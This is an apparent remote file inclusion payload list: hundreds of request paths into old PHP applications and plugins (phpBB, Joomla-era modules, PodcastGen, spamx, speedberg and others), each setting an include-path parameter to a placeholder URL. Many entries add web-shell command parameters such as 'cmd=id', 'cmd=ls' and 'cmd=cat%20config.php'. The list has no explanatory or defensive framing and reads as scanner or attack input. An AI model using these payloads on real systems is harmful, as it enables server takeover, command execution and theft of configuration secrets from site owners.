/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX
/modules/My_eGallery/index.php?basepath=XXpathXX
/modules/My_eGallery/public/displayCategory.php?basepath=XXpathXX
/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=XXpathXX?
/modules/NukeAI/util.php?AIbasedir=XXpathXX
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=XXpathXX
/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX
/modules/abook/foldertree.php?baseDir==XXpathXX?
/modules/addons/plugin.php?doc_root=XXpathXX
/modules/admin/include/config.php?doc_root=XXpathXX
/modules/admin/include/localize.php?doc_root=XXpathXX
/modules/agendax/addevent.inc.php?agendax_path=XXpathXX&cmd=id
/modules/bank/includes/design/main.inc.php?bank_data[root]=XXpathXX?
/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=XXpathXX
/modules/birstday/birst.php?exbb[home_path]=XXpathXX?
/modules/birstday/profile_show.php?exbb[home_path]=XXpathXX?
/modules/birstday/select.php?exbb[home_path]=XXpathXX?
/modules/blocks/headerfile.php?system[path]=XXpathXX
/modules/calendar/index.php?inc_dir=XXpathXX
/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=XXpathXX?
/modules/calendar/mod_calendar.php?absolute_path=XXpathXX?
/modules/certinfo/index.php?full_path=XXpathXX
/modules/character_roster/include.php?mod_root=XXpathXX?
/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=XXpathXX?
/modules/coppermine/themes/default/theme.php?THEME_DIR=XXpathXX
/modules/downloads/lib/LM_Downloads.php?pathToIndex=XXpathXX
/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=XXpathXX
/modules/emails/index.php?full_path=XXpathXX
/modules/events/index.php?full_path=XXpathXX
/modules/fax/index.php?full_path=XXpathXX
/modules/files/blocks/latest_files.php?system[path]=XXpathXX
/modules/files/index.php?full_path=XXpathXX
/modules/files/list.php?full_path=XXpathXX
/modules/filters/headerfile.php?system[path]=XXpathXX
/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=XXpathXX?
/modules/forums/blocks/latest_posts.php?system[path]=XXpathXX
/modules/global/inc/content.inc.php?sIncPath=XXpathXX?
/modules/groupadm/index.php?full_path=XXpathXX
/modules/groups/headerfile.php?system[path]=XXpathXX
/modules/guestbook/index.php?CONFIG[local_root]=XXpathXX?
/modules/history/index.php?full_path=XXpathXX
/modules/home.module.php?repmod=XXpathXX?
/modules/horoscope/footer.php?xoopsConfig[root_path]=XXpathXX
/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=XXpathXX
/modules/info/index.php?full_path=XXpathXX
/modules/links/blocks/links.php?system[path]=XXpathXX
/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX
/modules/links/submit_links.php?rootdp=zZz&gsLanguage=XXpathXX
/modules/log/index.php?full_path=XXpathXX
/modules/mail/index.php?full_path=XXpathXX
/modules/menu/headerfile.php?system[path]=XXpathXX
/modules/messages/index.php?full_path=XXpathXX
/modules/mod_as_category.php?mosConfig_absolute_path=XXpathXX
/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=XXpathXX
/modules/mod_calendar.php?absolute_path=XXpathXX
/modules/mod_flatmenu.php?mosConfig_absolute_path=XXpathXX
/modules/mod_mainmenu.php?mosConfig_absolute_path=XXpathXX
/modules/mod_weather.php?absolute_path=XXpathXX?
/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=XXpathXX?
/modules/newbb_plus/config.php?bbPath[root_theme]=XXpathXX
/modules/newbb_plus/votepolls.php?bbPath[path]=XXpathXX
/modules/news/blocks/latest_news.php?system[path]=XXpathXX
/modules/newusergreatings/pm_newreg.php?exbb[home_path]=XXpathXX?
/modules/organizations/index.php?full_path=XXpathXX
/modules/phones/index.php?full_path=XXpathXX
/modules/pms/index.php?module_path=XXpathXX???
/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX
/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=XXpathXX?
/modules/presence/index.php?full_path=XXpathXX
/modules/projects/index.php?full_path=XXpathXX
/modules/projects/list.php?full_path=XXpathXX
/modules/projects/summary.inc.php?full_path=XXpathXX
/modules/punish/p_error.php?exbb[home_path]=XXpathXX?
/modules/punish/profile.php?exbb[home_path]=XXpathXX?
/modules/reports/index.php?full_path=XXpathXX
/modules/search/index.php?full_path=XXpathXX
/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX?
/modules/settings/headerfile.php?system[path]=XXpathXX
/modules/snf/index.php?full_path=XXpathXX
/modules/syslog/index.php?full_path=XXpathXX
/modules/tasks/index.php?full_path=XXpathXX
/modules/tasks/searchsimilar.php?full_path=XXpathXX
/modules/tasks/summary.inc.php?full_path=XXpathXX
/modules/threadstop/threadstop.php?exbb[home_path]=XXpathXX?
/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX
/modules/tml/block.tag.php?GLOBALS[PTH][classes]=XXpathXX
/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=XXpathXX
/modules/useradm/index.php?full_path=XXpathXX
/modules/users/headerfile.php?system[path]=XXpathXX
/modules/vWar_Account/includes/functions_common.php?vwar_root2=XXpathXX
/modules/visitors2/include/config.inc.php?lvc_include_dir=XXpathXX?
/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=XXpathXX
/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=XXpathXX
/modules/xfsection/modify.php?dir_module=XXpathXX
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=XXpathXX
/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX
/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX?
/modulistica/mdl_save.php?CLASSPATH=XXpathXX
/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=XXpathXX?
/moodle/admin/utfdbmigrate.php?cmd=XXpathXX
/moosegallery/display.php?type=XXpathXX?&cmd=[command]
/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=XXpathXX
/moteur/moteur.php?chemin=XXpathXX?
/movie_cls.php?full_path=XXpathXX
/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX
/music/buycd.php?HTTP_DOCUMENT_ROOT=XXpathXX?
/mutant_includes/mutant_functions.php?phpbb_root_path=XXpathXX
/mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=XXpathXX
/mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=XXpathXX
/mygallery/myfunctions/mygallerybrowser.php?myPath=XXpathXX
/myphpcommander_path/system/lib/package.php?gl_root=XXpathXX?cmd
/mysave.php?file=XXpathXX
/naboard_pnr.php?skin=XXpathXX?
/ncaster/admin/addons/archive/archive.php?adminfolder=XXpathXX
/network_module_selector.php?path_prefix=XXpathXX
/news.php?CONFIG[script_path]=XXpathXX?
/news.php?config[root_ordner]=XXpathXX?&cmd=id
/news.php?scriptpath=XXpathXX?
/news.php?vwar_root=XXpathXX
/news/include/createdb.php?langfile;=XXpathXX?
/news/include/customize.php?l=XXpathXX?
/news/newstopic_inc.php?indir=XXpathXX
/news/scripts/news_page.php?script_path=XXpathXX?
/newsadmin.php?action=XXpathXX
/newsarchive.php?path_to_script=XXpathXX?&cmd=ls
/newsfeeds/includes/aggregator.php?zf_path=XXpathXX
/newsfeeds/includes/controller.php?zf_path=XXpathXX
/newsletter/newsletter.php?waroot=XXpathXX
/newsp/lib/class.Database.php?path=XXpathXX?
/newticket.php?lang=XXpathXX
/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=XXpathXX
/noticias.php?inc=XXpathXX?
/nucleus/plugins/skinfiles/index.php?DIR_LIBS=XXpathXX
/nuke_path/iframe.php?file=XXpathXX
/nukebrowser.php?filnavn=XXpathXX&filhead=XXpathXX&cmd=id
/nuseo/admin/nuseo_admin_d.php?nuseo_dir=XXpathXX?
/oaboard_en/forum.php?inc=XXpathXX
/ocp-103/index.php?req_path=XXpathXX
/ocs/include/footer.inc.php?fullpath=XXpathXX?
/ocs/include/theme.inc.php?fullpath=XXpathXX?
/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=XXpathXX?
/olbookmarks-0.7.4/themes/test1.php?XXpathXX
/oneadmin/adminfoot.php?path[docroot]=XXpathXX
/oneadmin/blogger/sampleblogger.php?path[docroot]=XXpathXX?
/oneadmin/config-bak.php?include_once=XXpathXX
/oneadmin/config.php?path[docroot]=XXpathXX
/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=XXpathXX?
/online.php?config[root_ordner]=XXpathXX?&cmd=id
/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=XXpathXX?
/openi-admin/base/fileloader.php?config[openi_dir]=XXpathXX
/openrat/themes/default/include/html/insert.inc.php?tpl_dir=XXpathXX???
/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=XXpathXX
/ops/gals.php?news_file=XXpathXX
/order/login.php?svr_rootscript=XXpathXX
/osData/php121/php121db.php?php121dir=XXpathXX%00
/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=XXpathXX?
/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=XXpathXX?
/owimg.php3?path=XXpathXX
/p-news.php?pn_lang=XXpathXX
/pafiledb/includes/pafiledb_constants.php?module_root_path=XXpathXX
/page.php?goto=XXpathXX
/page.php?id=XXpathXX
/panel/common/theme/default/header_setup.php?path[docroot]=XXpathXX
/param_editor.php?folder=XXpathXX?
/parse/parser.php?WN_BASEDIR=XXpathXX
/patch/?language_id=XXpathXX
/patch/tools/send_reminders.php?noSet=0&includedir=XXpathXX?
/paypalipn/ipnprocess.php?INC=XXpathXX?
/pda/pda_projects.php?offset=XXpathXX
/phfito/phfito-post?SRC_PATH=XXpathXX
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=XXpathXX
/photo_comment.php?toroot=XXpathXX
/php-inc/log.inc.php?SKIN_URL=XXpathXX
/php-include-robotsservices.php?page=XXpathXX
/php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=XXpathXX
/php.incs/common.inc.php?cm_basedir=XXpathXX?
/php/init.gallery.php?include_class=XXpathXX/something
/php121db.php?php121dir=XXpathXX%00
/php4you.php?dir=XXpathXX?
/phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=XXpathXX?
/phpBB2/shoutbox.php?phpbb_root_path=XXpathXX
/phpCards.header.php?CardPath=XXpathXX?
/phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=XXpathXX
/phpMyChat.php3?=XXpathXX?cmd=id
/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=XXpathXX?
/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=XXpathXX?
/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX
/phpbb/sendmsg.php?phpbb_root_path=XXpathXX
/phpcalendar/includes/calendar.php?phpc_root_path=XXpathXX?
/phpcalendar/includes/setup.php?phpc_root_path=XXpathXX?
/phpdebug_PATH/test/debug_test.php?debugClassLocation=XXpathXX
/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=XXpathXX
/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=XXpathXX
/phphd_downloads/common.php?phphd_real_path=XXpathXX
/phphost_directoryv2/include/admin.php?rd=XXpathXX?
/phphtml.php?htmlclass_path=XXpathXX
/phpi/edit_top_feature.php?include_connection=XXpathXX
/phpi/edit_topics_feature.php?include_connection=XXpathXX
/phplib/site_conf.php?ordnertiefe=XXpathXX
/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/module/referenz.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=XXpathXX
/phplinks/includes/smarty.php?full_path_to_public_program=XXpathXX
/phporacleview/inc/include_all.inc.php?page_dir=XXpathXX?
/phppc/poll.php?is_phppc_included=1&relativer_pfad=XXpathXX?
/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=XXpathXX?
/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=XXpathXX?
/phpquickgallery/gallery_top.inc.php?textFile=XXpathXX
/phpreactor/inc/polls.inc.php?pathtohomedir=XXpathXX?
/phpreactor/inc/updatecms.inc.php?pathtohomedir=XXpathXX?
/phpreactor/inc/users.inc.php?pathtohomedir=XXpathXX?
/phpreactor/inc/view.inc.php?pathtohomedir=XXpathXX?
/phpress/adisplay.php?lang=XXpathXX
/phpunity-postcard.php?plgallery_epost=1&gallery_path=XXpathXX?
/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=XXpathXX
/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=XXpathXX
/phpyabs/moduli/libri/index.php?Azione=XXpathXX
/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=XXpathXX
/playlist.php?phpbb_root_path=XXpathXX
/plugin/HP_DEV/cms2.php?s_dir=XXpathXX?
/plugin/gateway/gnokii/init.php?apps_path[plug]=XXpathXX?
/plugins/1_Adressbuch/delete.php?folder=XXpathXX
/plugins/BackUp/Archive.php?bkpwp_plugin_path=XXpathXX?
/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=XXpathXX?
/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=XXpathXX?
/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=XXpathXX?
/plugins/links/functions.inc?_CONF[path]=XXpathXX
/plugins/polls/functions.inc?_CONF[path]=XXpathXX
/plugins/rss_importer_functions.php?sitepath=XXpathXX?
/plugins/safehtml/HTMLSax3.php?dir[plugins]=XXpathXX?
/plugins/safehtml/safehtml.php?dir[plugins]=XXpathXX?
/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=XXpathXX
/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=XXpathXX
/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=XXpathXX
/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=XXpathXX
/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=XXpathXX
/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=XXpathXX
/plugins/spamx/Import.Admin.class.php?_CONF[path]=XXpathXX
/plugins/spamx/LogView.Admin.class.php?_CONF[path]=XXpathXX
/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=XXpathXX
/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=XXpathXX
/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=XXpathXX
/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=XXpathXX
/plugins/staticpages/functions.inc?_CONF[path]=XXpathXX
/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=XXpathXX
/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls&_PX_config[manager_path]=XXpathXX
/plus.php?_pages_dir=XXpathXX?
/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=XXpathXX?
/pmi_v28/Includes/global.inc.php?strIncludePrefix=XXpathXX
/pmi_v28/Includes/global.inc.php?strIncludePrefix=XXpathXX?
/podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/login.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=XXpathXX
/podcastgen1.0beta2/core/archive_cat.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/recent_list.php?absoluteurl=XXpathXX
/poll/view.php?int_path=XXpathXX
/pollvote.php?pollname=XXpathXX?&cmd=ls
/pop.php?base=XXpathXX
/popup_window.php?site_isp_root=XXpathXX?
/port.php?content=XXpathXX
/portal/includes/portal_block.php?phpbb_root_path=XXpathXX
/portal/portal.php?phpbb_root_path=XXpathXX?
/portfolio.php?id=XXpathXX
/portfolio/commentaires/derniers_commentaires.php?rep=XXpathXX?
/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=XXpathXX
/prepare.php?xcart_dir=XXpathXX?
/prepend.php?_PX_config[manager_path]=XXpathXX
/preview.php?php_script_path=XXpathXX?&cmd=dir
/principal.php?conteudo=XXpathXX
/print.php?page=XXpathXX
/print.php?pager=XXpathXX
/print.php?print=XXpathXX?
/process.php?DEFAULT_SKIN=XXpathXX
/professeurs/index.php?repertoire_config=XXpathXX
/profil.php?config[root_ordner]=XXpathXX?&cmd=id
/projects/weatimages/demo/index.php?ini[langpack]=XXpathXX
/promocms/newspublish/include.php?path[bdocroot]=XXpathXX
/protection.php?logout_page=XXpathXX?
/provider/auth.php?xcart_dir=XXpathXX?
/psynch/nph-psa.exe?css=XXpathXX
/psynch/nph-psf.exe?css=XXpathXX
/public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=XXpathXX?
/public_html/modules/Forums/favorites.php?nuke_bb_root_path=XXpathXX?
/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=XXpathXX
/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=XXpathXX
/qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=XXpathXX?
/qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=XXpathXX?
/qte_web.php?qte_web_path=XXpathXX?
/quick_reply.php?phpbb_root_path=XXpathXX&mode=[file]
/quickie.php?QUICK_PATH=XXpathXX?&cmd=id
/random2.php?path_to_folder=XXpathXX
/randshop/index.php?incl=XXpathXX?
/rdf.php?page[path]=XXpathXX?&cmd=ls
/reactivate.php?base_dir=XXpathXX
/read.php?data=XXpathXX?
/readmore.php?config["sipssys"]=XXpathXX
/recent.php?insPath=XXpathXX
/rechnung.php?_PHPLIB[libdir]=XXpathXX?
/reconfig.php?GLOBALS[CLPath]=XXpathXX
/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=XXpathXX
/redirect.php?url=XXpathXX
/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=XXpathXX
/register.php?base_dir=XXpathXX
/releasenote.php?mosConfig_absolute_path=XXpathXX
/rempass.php?lang=XXpathXX
/report.php?scriptpath=XXpathXX?
/reports/who_r.php?bj=XXpathXX
/resources/includes/class.Smarty.php?cfg[sys][base_path]=XXpathXX
/ressourcen/dbopen.php?home=XXpathXX?
/robotstats.inc.php?DOCUMENT_ROOT=XXpathXX?
/root/public/code/cp_html2txt.php?page=XXpathXX
/routines/fieldValidation.php?jssShopFileSystem=XXpathXX
/rspa/framework/Controller_v4.php?__ClassPath=XXpathXX
/rspa/framework/Controller_v4.php?__ClassPath=XXpathXX?
/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=XXpathXX
/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=XXpathXX?
/rss.php?page[path]=XXpathXX?&cmd=ls
/rss.php?phpraid_dir=XXpathXX
/rss.php?premodDir=XXpathXX
/rss2.php?page[path]=XXpathXX?&cmd=ls
/run.php?dir=SHELL?&file=XXpathXX
/s01.php?shopid=XXpathXX
/s01.php?shopid=XXpathXX?
/s02.php?shopid=XXpathXX?
/s03.php?shopid=XXpathXX?
/s04.php?shopid=XXpathXX?
/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=XXpathXX
/sablonlar/gunaysoft/gunaysoft.php?sayfaid=XXpathXX
/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=XXpathXX
/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=XXpathXX?
/sample/xls2mysql/parser_path=XXpathXX?
/save.php?file_save=XXpathXX
/saveserver.php?thisdir=XXpathXX
/script//ident/index.php?path_inc=XXpathXX
/script/_conf/core/common-tpl-vars.php?confdir=XXpathXX?
/script/common.inc.php?path_inc=XXpathXX
/script/gestion/index.php?path_inc=XXpathXX
/script/ident/disconnect.php?path_inc=XXpathXX
/script/ident/ident.inc.php?path_inc=XXpathXX
/script/ident/identification.php?path_inc=XXpathXX
/script/ident/loginliste.php?path_inc=XXpathXX
/script/ident/loginmodif.php?path_inc=XXpathXX
/script/index.php?path_inc=XXpathXX
/script/init/createallimagecache.php?PATH_TO_CODE=XXpathXX
/script/menu/menuadministration.php?path_inc=XXpathXX
/script/menu/menuprincipal.php?path_inc=XXpathXX
/script/param/param.inc.php?path_inc=XXpathXX
/script/plugins/phpgacl/admin/index.php?path_inc=XXpathXX
/script/template/index.php?main_page_directory=XXpathXX
/script/tick/allincludefortick.php?PATH_TO_CODE=XXpathXX
/script/tick/test.php?PATH_TO_CODE=XXpathXX
/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=XXpathXX?
/script_path/cms/classes/openengine/filepool.php?oe_classpath=XXpathXX?
/script_path/installation/index.php?mosConfig_absolute_path=XXpathXX?
/script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=XXpathXX
/scripts/check-lom.php?ETCDIR=XXpathXX
/scripts/gallery.scr.php?GLOBALS[PTH][func]=XXpathXX?
/scripts/lom_update.php?ETCDIR=XXpathXX
/scripts/news.scr.php?GLOBALS[PTH][classes]=XXpathXX?
/scripts/polls.scr.php?GLOBALS[PTH][classes]=XXpathXX?
/scripts/rss.scr.php?GLOBALS[PTH][classes]=XXpathXX?
/scripts/search.scr.php?GLOBALS[PTH][classes]=XXpathXX?
/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=XXpathXX
/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=XXpathXX?
/scripts/weigh_keywords.php?ETCDIR=XXpathXX
/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=XXpathXX?
/search.php?config["sipssys"]=XXpathXX
/search.php?id=XXpathXX
/search.php?insPath=XXpathXX
/search/submit.php?config["sipssys"]=XXpathXX
/search_wA.php?LIBPATH=XXpathXX
/searchbot.php?path=XXpathXX
/security/include/_class.security.php?PHPSECURITYADMIN_PATH=XXpathXX
/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=XXpathXX?
/sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=XXpathXX?
/senetman/html/index.php?page=XXpathXX
/services.php?page=XXpathXX
/services/samples/inclusionService.php?CabronServiceFolder=XXpathXX%00
/settings.php?P[includes]=XXpathXX
/settings_sql.php?path=XXpathXX
/setup/inc/database.php?tcms_administer_site=XXpathXX
/setup/upgrader.php?RootDirectory=XXpathXX
/sezhoo/SezHooTabsAndActions.php?IP=XXpathXX
/shop/includes/header.inc.php?dateiPfad=XXpathXX
/shop/index.php?action=XXpathXX?&cmd=cat%20config.php
/shop/page.php?osCsid=XXpathXX?
/shop/page.php?pageid=XXpathXX?
/shoutbox.php?language=XXpathXX
/shoutbox.php?root=XXpathXX?cmd=id
/show.php?file=XXpathXX
/show.php?id=XXpathXX
/show.php?page=XXpathXX
/show.php?path=XXpathXX
/show_archives.php?cutepath=XXpathXX?
/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=XXpathXX
/sid=XXpathXX
/signer/final.php?smiley=XXpathXX?
/signin.php?sent=1&AMG_serverpath=XXpathXX
/sinagb.php?fuss=XXpathXX
/sinapis.php?fuss=XXpathXX
/sitebar/Integrator.php?file=XXpathXX
/sitebar/index.php?writerFile=XXpathXX
/sitebuilder/admin/top.php?admindir=XXpathXX
/sitemap.xml.php?dir[classes]=XXpathXX
/skin/board/default/doctype.php?dir=XXpathXX
/skin/dark/template.php?path=XXpathXX
/skin/gold/template.php?path=XXpathXX
/skin/html/table.php?pachtofile=XXpathXX
/skin/original/template.php?path=XXpathXX
/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=XXpathXX
/skins/advanced/advanced1.php?pluginpath[0]=XXpathXX
/skins/default.php?dir_inc=XXpathXX
/skins/header.php?ote_home=XXpathXX
/skins/phpchess/layout_admin_cfg.php?Root_Path=XXpathXX
/skins/phpchess/layout_cfg.php?Root_Path=XXpathXX
/skins/phpchess/layout_t_top.php?Root_Path=XXpathXX
/skysilver/login.tpl.php?theme=XXpathXX?
/slogin_lib.inc.php?slogin_path=XXpathXX?
/smarty.php?xcart_dir=XXpathXX?
/smarty/smarty_class.php?_smarty_compile_path=XXpathXX
/smilies.php?config=XXpathXX
/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX?
/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=XXpathXX?
/snort/base_stat_common.php?BASE_path=XXpathXX
/social_game_play.php?path=XXpathXX?
/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=XXpathXX
/song.php?phpbb_root_path=XXpathXX
/source.php?bibtexrootrel=XXpathXX?
/source/mod/rss/channeledit.php?Codebase=XXpathXX
/source/mod/rss/post.php?Codebase=XXpathXX
/source/mod/rss/view.php?Codebase=XXpathXX
/source/mod/rss/viewitem.php?Codebase=XXpathXX
/sources/Admin/admin_cats.php?CONFIG[main_path]=XXpathXX
/sources/Admin/admin_edit.php?CONFIG[main_path]=XXpathXX
/sources/Admin/admin_import.php?CONFIG[main_path]=XXpathXX
/sources/Admin/admin_templates.php?CONFIG[main_path]=XXpathXX
/sources/functions.php?CONFIG[main_path]=XXpathXX
/sources/help.php?CONFIG[main_path]=XXpathXX
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=XXpathXX
/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=XXpathXX
/sources/mail.php?CONFIG[main_path]=XXpathXX
/sources/misc/new_day.php?path=XXpathXX
/sources/news.php?CONFIG[main_path]=XXpathXX
/sources/post.php?fil_config=XXpathXX
/sources/template.php?CONFIG[main_path]=XXpathXX
/sources/tourney/index.php?page=XXpathXX?
/spaw/spaw_control.class.php?GLOBALS[spaw_root]=XXpathXX
/spaw/spaw_control.class.php?spaw_root=XXpathXX
/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=XXpathXX
/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=XXpathXX
/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=XXpathXX
/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=XXpathXX
/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=XXpathXX
/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=XXpathXX
/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=XXpathXX
/spellcheckwindowframeset.php?SpellIncPath=XXpathXX
/squirrelcart/cart_content.php?cart_isp_root=XXpathXX
/src/ark_inc.php?cfg_pear_path=XXpathXX?
/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=XXpathXX
/src/scripture.php?pageHeaderFile=XXpathXX?
/starnet/themes/c-sky/main.inc.php?cmsdir=XXpathXX?
/start.php?lang=XXpathXX
/start.php?pg=XXpathXX
/stat_modules/users_age/module.php?phpbb_root_path=XXpathXX
/stats.php?vwar_root=XXpathXX
/stphpapplication.php?STPHPLIB_DIR=XXpathXX
/stphpbtnimage.php?STPHPLIB_DIR=XXpathXX
/stphpform.php?STPHPLIB_DIR=XXpathXX
/str.php?p=XXpathXX
/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=XXpathXX
/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=XXpathXX?
/strload.php?LangFile=XXpathXX
/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls%20-al&ABSOLUTE_PATH_STUDIP=XXpathXX?
